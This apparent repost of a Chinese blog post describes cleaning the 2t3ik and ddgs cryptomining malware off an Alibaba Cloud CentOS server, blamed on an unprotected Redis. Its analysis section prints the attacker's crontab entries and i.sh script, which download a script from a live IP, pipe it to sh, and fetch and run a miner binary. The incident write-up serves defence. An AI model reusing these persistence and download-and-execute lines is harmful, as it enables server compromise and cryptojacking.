阿里云centos上处理2t3ik与ddgs病毒

2024-08-28 00:58

本文主要是介绍阿里云centos上处理2t3ik与ddgs病毒,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

阿里云centos上处理2t3ik与ddgs病毒

 

有段时间没有登陆阿里云了,前两天收到阿里云的短信,意思是:检测到我的linux服务器出现异常文件下载,请登陆控制台查看,我登陆控制台看到如下图显示

系统centos

由于我是新手,点了半天也没有免费的修复的按钮,而且升级企业版才可以查看,穷屌丝一个,升级企业版是不可能得到……

于是我就没有管它。

今天有时间登陆阿里云服务器看看什么情况,使用xshell连接,输入命令时候一卡一卡的,我还以为是xshell的问题呢,于是我还了putty登陆,还是一样,输入一个字母都卡半天,这就表明不是xshell的问题了,耐着性子输入top命令以查看,有个2t3ik.p的进程占用着99%多的CPU使用率,我赶紧把这个进程杀了,嗯,这下用着不卡了。

可是还没有等到半分钟,又开始一卡一卡的,继续使用top命令一看,还是这个2t3ik.p,只不过换了个PID

我也不知道这个进程是干什么的,可是不管这个是什么作用的进程让我的服务器卡顿我都要杀掉,于是我就百度搜索了这个进程,遗憾的是在百度上2t3ik.p这个关键字搜不到什么相关的信息

百度不行那我上阿里云官网看看有什么解决的办法,很遗憾,找不到,那我就谷歌吧,说起来还是谷歌好,虽然相关结果不多,也是让我找到线索处理这个2t3ik.p进程了,这个进程文件在/tmp目录下

于是把这个2t3ik.p文件删除,可是没过过一分钟又出现了这个文件,阿里云的管理台上提示出现异常文件文件下载

然后我吧这个文件删除掉,在新建一个2t3ik.p文件,不给权限,2t3ik.p进程是没有了,却又出现2t3ik.m这个进程

在/tmp文件夹下有2t3ik.m这个文件

想到过给/tmp文件夹添加不可修改的权限,觉得不大现实,因为以后这个文件夹会用到

那么把所有让所有以2t3ik开头的文件不给修改权限

使用命令

chattr +i 2t3ik*

chattr +i ddgs*

搞定,再也没有2t3ik的进程了

再也没有恼人的2t3ik病毒了

PS:阿里云的aliyundun真的不管用,对这个进程竟然防不了

PPS:阿里云对异常处理竟然还要升级企业版才能查看与一键处理,我一介屌丝哪来这个闲钱去升级啊

 

 

 

2t3ik与ddgs挖矿病毒处理

一、问题现象 

朋友的阿里云LINUX服务器, 发现有2t3ik与ddgs两个异常进程,把CPU几乎耗尽了。其描述kill掉以后,过一会儿又会重新出现。 

2t3ik_worm

二、分析处理

即然kill 后过一会儿又会出现,那就有两种可能:1、crontab定时调用;2、有守护进程,个别病毒还会修改ps和top,通过这些命令无法查看到隐藏的守护进程。先看了下crontab,发现如下两条内容:

 

 
  1. */5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh
  2. */5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh

查询了下165.225.157.157这个IP来自美国拉斯维加斯。获取了下i.sh脚本,发现内容如下:

 

 
  1. export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin
  2. echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/root
  3. echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/root
  4. mkdir -p /var/spool/cron/crontabs
  5. echo "*/5 * * * * curl -fsSL http://165.225.157.157:8000/i.sh | sh" > /var/spool/cron/crontabs/root
  6. echo "*/5 * * * * wget -q -O- http://165.225.157.157:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
  7. if [ ! -f "/tmp/ddgs.3011" ]; then
  8. curl -fsSL http://165.225.157.157:8000/static/3011/ddgs.i686 -o /tmp/ddgs.3011
  9. fi
  10. chmod +x /tmp/ddgs.3011 && /tmp/ddgs.3011
  11. ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
  12. ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
  13. ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
  14. ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
  15. ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
  16. ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill

简单的一个shell 脚本,前面是创建crontab定时任务,后面下面了ddgs.i686程序并执行。可以确定就是这个来自美国的国际友人的程序干的坏事了。

删除crontab内容,并kill 掉相关进程后,观察一段时间发现其不再重新出现。问题解决。当然,为避免其后面再出现,可以做以下预防操作:

 

 
  1. cd /tmp/
  2. rm -rf 2t3ik.p
  3. rm -rf ddgs.3011
  4. touch 2t3ik.p
  5. touch ddgs.3011
  6. chattr +i 2t3ik*
  7. chattr +i ddgs*

 

三、产生原因

网上也找了下该病毒的相关信息,了解到其一般是由于安装了redis后,未设置密码或密码太过简单,导致的被入侵。redis密码修改方法如下:

 

 
  1. redis-cli -h 127.0.0.1 -p 6379
  2. config get requirepass //获取当前密码
  3. config set requirepass "yourpassword"//设置当前密码,服务重新启动后又会置为默认,即无密码;

永久生效方法为,打开redis配置文件redis.conf,找到requirepass值修改密码,如下:

 
  1. requirepass yourpassword //此处注意,行前不能有空格

另外,平时还是建议安装chkrootkit、rkhunter、Lynis、ISPProtect这类安全工具,定期做扫描。

 

这篇关于阿里云centos上处理2t3ik与ddgs病毒的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1113282

相关文章

无人叉车3d激光slam多房间建图定位异常处理方案-墙体画线地图切分方案

墙体画线地图切分方案 针对问题:墙体两侧特征混淆误匹配,导致建图和定位偏差,表现为过门跳变、外月台走歪等 ·解决思路:预期的根治方案IGICP需要较长时间完成上线,先使用切分地图的工程化方案,即墙体两侧切分为不同地图,在某一侧只使用该侧地图进行定位 方案思路 切分原理:切分地图基于关键帧位置,而非点云。 理论基础:光照是直线的,一帧点云必定只能照射到墙的一侧,无法同时照到两侧实践考虑:关

阿里开源语音识别SenseVoiceWindows环境部署

SenseVoice介绍 SenseVoice 专注于高精度多语言语音识别、情感辨识和音频事件检测多语言识别: 采用超过 40 万小时数据训练,支持超过 50 种语言,识别效果上优于 Whisper 模型。富文本识别:具备优秀的情感识别,能够在测试数据上达到和超过目前最佳情感识别模型的效果。支持声音事件检测能力,支持音乐、掌声、笑声、哭声、咳嗽、喷嚏等多种常见人机交互事件进行检测。高效推

【生成模型系列(初级)】嵌入(Embedding)方程——自然语言处理的数学灵魂【通俗理解】

【通俗理解】嵌入(Embedding)方程——自然语言处理的数学灵魂 关键词提炼 #嵌入方程 #自然语言处理 #词向量 #机器学习 #神经网络 #向量空间模型 #Siri #Google翻译 #AlexNet 第一节:嵌入方程的类比与核心概念【尽可能通俗】 嵌入方程可以被看作是自然语言处理中的“翻译机”,它将文本中的单词或短语转换成计算机能够理解的数学形式,即向量。 正如翻译机将一种语言

Thymeleaf:生成静态文件及异常处理java.lang.NoClassDefFoundError: ognl/PropertyAccessor

我们需要引入包: <dependency><groupId>org.springframework.boot</groupId><artifactId>spring-boot-starter-thymeleaf</artifactId></dependency><dependency><groupId>org.springframework</groupId><artifactId>sp

jenkins 插件执行shell命令时,提示“Command not found”处理方法

首先提示找不到“Command not found,可能我们第一反应是查看目标机器是否已支持该命令,不过如果相信能找到这里来的朋友估计遇到的跟我一样,其实目标机器是没有问题的通过一些远程工具执行shell命令是可以执行。奇怪的就是通过jenkinsSSH插件无法执行,经一番折腾各种搜索发现是jenkins没有加载/etc/profile导致。 【解决办法】: 需要在jenkins调用shell脚

centos 6安装 vim

centos 安装vim 1.首先查询当前当前vim所依赖的包存在不存在.检查缺少哪个几个依赖包 [root@bogon firstCopy]# rpm -qa|grep vivimvim-common-7.4.160-5.el7.x86_64vim-enhanced-7.4.160-5.el7.x86_64vim-filesystem-7.4.160-5.el7.x86_64vim-

NGINX轻松管理10万长连接 --- 基于2GB内存的CentOS 6.5 x86-64

转自:http://blog.chinaunix.net/xmlrpc.php?r=blog/article&uid=190176&id=4234854 一 前言 当管理大量连接时,特别是只有少量活跃连接,NGINX有比较好的CPU和RAM利用率,如今是多终端保持在线的时代,更能让NGINX发挥这个优点。本文做一个简单测试,NGINX在一个普通PC虚拟机上维护100k的HTTP

CentOS下mysql数据库data目录迁移

https://my.oschina.net/u/873762/blog/180388        公司新上线一个资讯网站,独立主机,raid5,lamp架构。由于资讯网是面向小行业,初步估计一两年内访问量压力不大,故,在做服务器系统搭建的时候,只是简单分出一个独立的data区作为数据库和网站程序的专区,其他按照linux的默认分区。apache,mysql,php均使用yum安装(也尝试

Linux Centos 迁移Mysql 数据位置

转自:http://www.tuicool.com/articles/zmqIn2 由于业务量增加导致安装在系统盘(20G)磁盘空间被占满了, 现在进行数据库的迁移. Mysql 是通过 yum 安装的. Centos6.5Mysql5.1 yum 安装的 mysql 服务 查看 mysql 的安装路径 执行查询 SQL show variables like

秒变高手:玩转CentOS 7软件更换的方法大全

在 CentOS 7 中更换软件源可以通过以下步骤完成。更换源可以加快软件包的下载速度,特别是当默认源速度较慢时。以下是详细步骤: 前言 为了帮助您解决在使用CentOS 7安装不了软件速度慢的问题,我们推出了这份由浪浪云赞助的教程——“CentOS7如何更换软件源加快下载速度”。 浪浪云,以他们卓越的弹性计算、云存储和网络服务受到广泛好评,他们的支持和帮助使得我们可以将最前沿的技术知识分